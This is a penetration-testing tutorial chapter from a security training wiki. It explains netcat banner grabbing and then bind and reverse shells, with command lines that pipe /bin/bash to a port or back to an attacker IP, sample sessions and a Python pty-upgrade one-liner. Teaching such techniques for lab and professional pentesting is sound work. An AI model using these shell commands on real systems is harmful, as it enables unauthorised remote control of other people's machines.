Now that we are able to identify open ports and accessible services on a target system, we can also communicate with them. In most cases, specific tools already exist for this purpose. Let’s take TCP port 22, for instance. It is registered with IANA (Internet Assigned Numbers Authority) and standardised for SSH. The openssh-client packet, which provides the tools ssh and scp, for example, can be installed on a Debian. It should be noted that the standardised ports are only considered an agreement, and that using or reserving them for the corresponding services is not compulsory. On the flipside, this also means that our above SSH server could be accessible through any other port.
But how can we communicate with services that are not known to us, and how do we even identify a service on a port? Let us introduce the netcat (nc) tool, which is used to transport standard input or output data over network connections. As we will see below, it does its reputation justice of being a Swiss Army Knife. Generally speaking, netcat offers two modes of operation – it can act both as a client and as a server, as shown by the following command lines:
Knowing this, it makes sense to simply establish a connection with netcat on the open ports in order to receive data from the server. For illustration purposes, in this example netcat was used to establish a connection to the target system 10.250.53.33 and TCP port 1035. The port answers with SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3, which can be interpreted as the associated software banner.
~$ nc 10.250.53.33 1035
SSH-2.0-OpenSSH_6.7p1 Debian-5+deb8u3
So we are able to connect to any service with netcat and get information about the service and its version through the server-side response information. This technique is called banner grabbing. But it should be noted that a server may not necessarily send data. Similar to TCP, we can also use netcat to send datagrams for UDP, for which we once again refer to the manpage (→ man nc).
With netcat, we can not only establish connections to services, but we can also transmit the inputs and outputs from local programs on a computer via the network. And why would this function be of interest to us as an attacker? Let’s remind ourselves of our objective: total takeover or compromise of the target system. And what local program could possibly give us more control over a system than a shell or the terminal itself? So if we are capable of executing a command through a previously identified security hole X, netcat can provide us with a so-called bind or reserve shell.
As the name of a bind shell already suggests, we open a port on the target system and redirect the input and output of a shell or the bash accordingly. To execute a command, all we have to do now is establish a connection from our attacker machine to the remote port:
Attacker:
~$ nc 10.250.53.33 4444
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Target system:
www-data@otrs:~$ nc -lvp 4444 -e /bin/bash
listening on [any] 4444 ...
10.20.1.14: inverse host lookup failed: Host name lookup failure
connect to [10.250.53.33] from (UNKNOWN) [10.20.1.14] 59252
Unlike a bind shell, with a reverse shell we open a port on our attacker machine and, in a second step, establish a connection from the target system back to us. In this process, the I/O of a shell or the terminal is connected to the socket. We can then send commands to our target system again as before:
Attacker:
~$ nc -lvp 4444
listening on [any] 4444 ...
10.250.53.33: inverse host lookup failed: Unknown host
connect to [10.20.1.14] from (UNKNOWN) [10.250.53.33] 59805
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
Target system:
www-data@otrs:~$ nc 10.20.1.14 4444 -e /bin/bash
A reverse shell with netcat is not interactive. This means that tools such as sudo, mysql, su etc. cannot be used or can only be used to a limited extent. If Python is installed on the target computer, a terminal can be easily simulated within the netcat session:
python -c 'import pty; pty.spawn("/bin/bash")'
Last modified: Dec. 15, 2022
Take a look at the pentest training chapters and learn penetration testing:
Discover the world of penetration testing. Learn how to infiltrate networks and successfully penetrate systems and applications. Acquire the necessary hacking skills and use them when conducting professional penetration tests. Become a real penetration tester. Here you will find the free documents for the Pentest Training of binsec academy GmbH. The binsec academy GmbH offers the corresponding security training lab environments and certifications. However, the knowledge and wiki articles on hacking and penetration testing is universal.
binsec academy GmbH is the European provider of online security training with virtual laboratory environments. The core component of all security training is the focus on practice, practice and more practice. In the wiki here you will find the public and freely available course materials. You can put the theory into practice at binsec-academy.com.